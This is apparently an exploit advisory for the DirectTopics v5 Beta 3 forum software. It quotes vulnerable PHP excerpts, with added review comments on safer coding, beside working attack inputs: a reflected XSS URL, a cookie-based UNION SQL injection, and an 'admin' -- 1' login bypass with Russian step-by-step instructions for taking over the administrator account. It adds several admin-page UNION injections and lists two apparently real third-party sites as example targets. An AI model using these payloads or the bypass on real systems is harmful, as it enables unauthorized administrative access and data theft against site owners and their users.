DirectTopics v5 Beta 3 http://www.directtopics.nl/
pxss
http://localhost/DT5/[email protected]&type=topic&forum=111&status=alle&sorteren=1>'><script>alert(121212)</script>&sorttype=ASC&submit=Zoeken
-------------------------
includes/config.inc.php
PHP:
/* Session bootstrap: decides whether the visitor is logged in from two cookies.
   NOTE(review): empty() already returns true for an unset index, so the leading
   !isset() check is redundant. */
if( !isset($_COOKIE['user_id']) || empty($_COOKIE['user_id']) || !is_numeric($_COOKIE['user_id']) || empty($_COOKIE['sessie_hash']) ){
    //No existing cookies, user not logged in
    $_SESSION['ingelogd'] = 0;
    $_SESSION['user_id'] = 0;
    $_SESSION['tijd_ingelogd'] = 0;
    $_SESSION['last_active'] = 0;
} elseif( !empty($_COOKIE['user_id']) && !empty($_COOKIE['sessie_hash']) ){
    //Cookies exist, check their value
    /* NOTE(review): both cookie values are concatenated straight into the SQL string.
       is_numeric() above only guards user_id; sessie_hash is never validated or escaped.
       Bind both values as prepared-statement parameters (PDO/mysqli) instead of building
       the query by hand. */
    $Sessies_Query = $Sql->Query("SELECT l.*, s.*, g.* FROM dt5_leden l, dt5_sessions s, dt5_groepen g WHERE s.userid = '".$_COOKIE['user_id']."' && s.hash = '".$_COOKIE['sessie_hash']."' && l.led_id = s.userid && g.groep_id = l.led_groep");
    $Sessie = mysql_fetch_array($Sessies_Query);
Blind SQL
http://localhost/DT5/index.php
cookies PHPSESSID=be3a9c4bec43b23eabd98ead717cb00e; sessie_hash=' UNION SELECT 1,(select+*+from(select+*+from(select+name_const((version()),1)d)+as+t+join+(select+name_const((version()),1)e)b)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 -- 1; user_id=2
-------------------------
inloggen.php
PHP:
/* Login form handler: looks the user up by nickname + md5(password), checks the ban
   list, then issues the session cookies and records the session in dt5_sessions. */
if( isset($_POST['submit']) ){
    /* NOTE(review): login_nickname is interpolated unescaped, and the credential check is a
       plain md5() digest compared inside the SQL against led_wachtwoord. Look the user up
       with a prepared statement on the nickname only, then verify the password in PHP with
       password_verify() against a password_hash() value. */
    $User_Check_Query = $Sql->Query("SELECT led_id, led_nickname, led_wachtwoord, led_active FROM dt5_leden WHERE led_nickname = '".$_POST['login_nickname']."' && led_wachtwoord = '".md5($_POST['login_wachtwoord'])."'");
    $User = mysql_fetch_array($User_Check_Query);
    if( $Sql->Count($User_Check_Query) == 0){
        $Tpl->newBlock('TOON_MELDING');
        $Tpl->Assign('MELDING', 'De ingevoerde combinatie is niet juist.');
    } else {
        /* NOTE(review): same unescaped $_POST['login_nickname'] as in the lookup above. */
        $Ban_Query = $Sql->Query("SELECT ban_gebnaam FROM dt5_ban WHERE ban_gebnaam = '".$_POST['login_nickname']."'");
        if( $Sql->Count($Ban_Query) > 0){
            $Tpl->newBlock('TOON_MELDING');
            $Tpl->Assign('MELDING', 'Deze gebruikersnaam is verbannen van het forum. Het is dus niet mogelijk in te loggen met deze gebruikersnaam.');
        } else {
            $User_nickname = $Txt->safeoutput($User['led_nickname']);
            /* NOTE(review): the session token is md5(led_id . nickname . time()). led_id and the
               nickname are not secret and time() has one-second resolution, so the value is
               guessable. Derive it from random_bytes() (e.g. bin2hex(random_bytes(32))) instead. */
            $Login_Hash = md5( $User['led_id'].$User_nickname.time() );
            $Sessie_naam = addslashes($_POST['sessie_naam']);
            /* NOTE(review): both cookies are set without the httponly/secure flags; the session
               cookie in particular should carry them so script on the page cannot read it. */
            setcookie('user_id', $User['led_id'], time()+3600*24*31, '/');
            setcookie('sessie_hash', $Login_Hash, time()+3600*24*31, '/');
            $_SESSION['ingelogd'] = 1;
            $_SESSION['user_id'] = $User['led_id'];
            $_SESSION['nickname'] = $User_nickname;
            /* Only sessie_naam is escaped here (addslashes); the other values come from the
               DB row, session_id(), REMOTE_ADDR and time(). A prepared statement would cover
               all of them uniformly. */
            $Sql->Query("INSERT INTO dt5_sessions (sessie_id, ingelogd, hash, userid, user_ip, tijd_ingelogd, tijd_lastactive, sessie_naam) VALUES ('".session_id()."', 'ja', '".$Login_Hash."', '".$User['led_id']."', '".$_SERVER['REMOTE_ADDR']."', '".time()."', '".time()."', '".$Sessie_naam."')");
            if( $User['led_active'] == 'nee' ){
                $Sql->Query("UPDATE dt5_leden SET led_active = 'ja' WHERE led_id = '".$User['led_id']."'");
            }
            $Tpl->newBlock('TOON_MELDING');
            $Tpl->Assign('MELDING', 'Je bent succesvol ingelogd als '.$User_nickname.'. Je wordt nu teruggestuurd naar de index.');
            header('Refresh: 3; url= '.$Global_install_url.'index'.$Global_extension);
Blind SQL mq=off
http://localhost/DT5/user.php/inloggen
post login_nickname=admin' -- 1
Заходим админом По адресу http://localhost/DT5/leden.php можно узнать логин администратора Логинимся http://localhost/DT5/user.php/inloggen в поле "Gebruikersnaam:" вводим имя админа и экранируем окончание SQL запроса Gebruikersnaam:admin' -- 1 Wachtwoord:пусто Locatie (Sessie naam) :пусто
Пример
http://www.onkrooid.be/forum/user.php/inloggen post login_nickname=Jonah' -- 1
http://examen2009.media2you.nl/user.php/inloggen Gebruikersnaam:Administrator' -- 1
-------------------------
admin/categorieen.php
PHP:
} elseif ( $_GET['a'] == 'wijzigen' ){
    if( isset($_POST['submit']) ){
        ...
    } else {
        /* NOTE(review): $_GET['id'] goes into the WHERE clause unescaped; the same pattern
           recurs in editprofiel.php and faqs.php below. Validate the id ((int) cast or
           ctype_digit()) or bind it as a parameter. */
        $Categorie_Query = $Sql->Query("SELECT * FROM dt5_categorie WHERE cat_id = '".$_GET['id']."'");
SQL mq=off доступ в админку
http://localhost/DT5/admin/index.php?a=wijzigen&s=subforum&p=categorieen&id=-1'+union+select+1,version(),3+--+
-------------------------
admin/editprofiel.php
PHP:
/* Member editor: without an id, offers a search by nickname and/or user id; with an id,
   loads that member directly. */
if( empty($_GET['id']) ){
    if( isset($_POST['submit_zoek']) ){
        if( empty($_POST['gebnaam']) && empty($_POST['userid']) ){
            $Tpl->newBlock('TOON_MELDING');
            $Tpl->Assign('MELDING', 'Je moet wel een Gebruikersnaam of GebruikersID invullen. Klik <a href="javascript:history.go(-1)">hier</a> om terug te gaan.');
        } else {
            /* The search branch escapes both POST fields with addslashes() before
               concatenating them. */
            $User_Check_Query = "SELECT led_id FROM dt5_leden WHERE ";
            if( empty($_POST['gebnaam']) && !empty($_POST['userid']) ){
                $User_Check_Query .= "led_id = '".addslashes($_POST['userid'])."'";
            } elseif( !empty($_POST['gebnaam']) && empty($_POST['userid']) ){
                $User_Check_Query .= "led_nickname = '".addslashes($_POST['gebnaam'])."'";
            } elseif( !empty($_POST['gebnaam']) && !empty($_POST['userid']) ){
                $User_Check_Query .= "led_nickname = '".addslashes($_POST['gebnaam'])."' && led_id = '".addslashes($_POST['userid'])."'";
            }
            ...
} else {
    /* NOTE(review): unlike the search branch above, this branch interpolates $_GET['id']
       raw — the escaping applied to gebnaam/userid is missing here. */
    $User_Query = $Sql->Query("SELECT * FROM dt5_leden WHERE led_id = '".$_GET['id']."'");
    $User = mysql_fetch_array($User_Query);
SQL mq=off доступ в админку
http://localhost/DT5/admin/index.php?s=leden&p=editprofiel&id=-1'+union+select+1,user(),3,4,database(),6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+--+
-------------------------
admin/faqs.php
PHP:
/* FAQ editor ('wijzigen' action): on submit, validates the required fields and updates
   the row; otherwise loads the FAQ to edit. */
} elseif ( $_GET['a'] == 'wijzigen' ){
    if( isset($_POST['submit']) ){
        if( empty($_POST['faq_titel']) || empty($_POST['faq_naam']) || empty($_POST['faq_bericht']) || empty($_POST['faq_inleiding']) ){
            $Tpl->newBlock('TOON_MELDING');
            $Tpl->Assign('TITEL', 'Fout!');
            $Tpl->Assign('MELDING', 'Je moet wel de volgende velden invullen:<br>- FAQ Titel<br>- FAQ Naam<br>- FAQ Bericht<br>- FAQ Inleiding<p>Klik <a href="javascript:history.go(-1)">hier</a> om terug te gaan.</p>');
        } else {
            $Faq_titel = addslashes($_POST['faq_titel']);
            $Faq_naam = addslashes($_POST['faq_naam']);
            $Faq_inleiding = addslashes($_POST['faq_inleiding']);
            $Faq_bericht = addslashes($_POST['faq_bericht']);
            /* faq_groepen is not part of the required-field check above, so it may be absent
               from the request (undefined index); read it with ?? '' or validate it too. */
            $Faq_groepen = addslashes($_POST['faq_groepen']);
            /* NOTE(review): the SET values are escaped, but the WHERE still uses $_GET['id']
               raw — see categorieen.php above. */
            $Sql->Query("UPDATE dt5_faqs SET faq_titel = '".$Faq_titel."', faq_naam = '".$Faq_naam."', faq_inleiding = '".$Faq_inleiding."', faq_bericht = '".$Faq_bericht."', faq_groepen = '".$Faq_groepen."' WHERE faq_id = '".$_GET['id']."'");
            $Tpl->newBlock('TOON_MELDING');
            $Tpl->Assign('TITEL', 'FAQ Gewijzigd');
            /* NOTE(review): $Faq_naam was addslashes()'d for SQL, but here it is placed inside
               an <a href="..."> without HTML/URL escaping (unless the template engine escapes
               assigned values — confirm). Apply htmlspecialchars()/rawurlencode() at this point. */
            $Tpl->Assign('MELDING', 'De FAQ is gewijzigd. 
Je kunt hem vinden door <a href="'.$Global_install_url.'faq'.$Global_extension.'/'.$Faq_naam.'" target="_blank">hier</a> te klikken.');
        }
    } else {
        /* NOTE(review): raw $_GET['id'] again. */
        $Faq_Query = $Sql->Query("SELECT * FROM dt5_faqs WHERE faq_id = '".$_GET['id']."'");
        $Faq = mysql_fetch_array($Faq_Query);
SQL mq=off доступ в админку
http://localhost/DT5/admin/index.php?s=beheer&p=faqs&a=wijzigen&id=-1'+union+select+1,version(),user(),database(),5,6+--+
-------------------------
аналогично
SQL mq=off доступ в админку
http://localhost/DT5/admin/index.php?s=leden&p=groepen&a=wijzigen&id=-1э+union+select+1,version(),3,user(),5,6,7,8+--+
http://localhost/DT5/admin/index.php?s=leden&p=notities&a=wijzigen&id=-2'+union+select+1,2,3,4,version(),6,user()+--+
http://localhost/DT5/admin/index.php?s=subforum&p=subforums&a=wijzigen&id=-1'+union+select+1,version(),3,4,user(),6,7,8,9,10,11,12,13+--+
-------------------------